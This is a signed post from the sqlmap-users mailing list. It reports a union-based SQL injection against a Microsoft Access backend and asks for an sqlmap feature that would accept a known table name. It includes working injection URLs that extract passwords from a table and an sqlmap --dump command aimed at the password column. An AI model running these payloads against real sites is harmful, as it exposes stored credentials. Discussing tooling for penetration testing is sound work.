-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi,
I've got a simple union based sqli (resulting webpage shows only one entry/row). Valid statements that show the numbers in the resulting html page: ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar - - foobar is an existing table (gathered via error messages in html) - - password is a valid column in the foobar table The following URL gives you one password: ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar Now I wanted to hand over to sqlmap to dump all passwords: sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password - --dump which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries. - - sqlmap was able to detect the number of columns is 13 (correct) - - sqlmap confirmed a bolean-based blind sqli vulnerability (but no UNION based sqli) - - sqlmap was able to confirm the existence of table name (with --tables) (echo foobar > txt/common-tables.txt) - - sqlmap was able to confirm the existence of column name password (with --colums) When running something like: - --technique=U --union-cols=13 --union-char=1 sqlmap requested something *like*: ...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00 which results in the following error message (shown in the html page): The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly. So if sqlmap would accept a known tablename on the command line that it would use to detect/confirm the union based sqli vuln, instead of using "MSysAccessObjects" this would make sqlmap more useful (or simply use the table name specified in -T or previously bruteforced to detect union-based sqli). thanks! PS: I did *not* run sqlmap with special --risk/--level because I don't want to send several unneeded http requests if the vulnerability is already confirmed (manually). I'm using sqlmap mainly for exploitation (not so much for detection) and would appreciate if the user could tell sqlmap how to exploit a certain sqli (something that is already partially given with --technique, --union-cols, --union-chars). I did use 1.0-dev-d1ae62b. ref: http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum 0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO 8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1 lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p 8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c 0p/jGfV1aHnEBhy3KpXe =Q1R5 -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ Everyone hates slow websites. So do we. Make your web apps faster with AppDynamics Download AppDynamics Lite for free today: http://p.sf.net/sfu/appdyn_d2d_mar _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
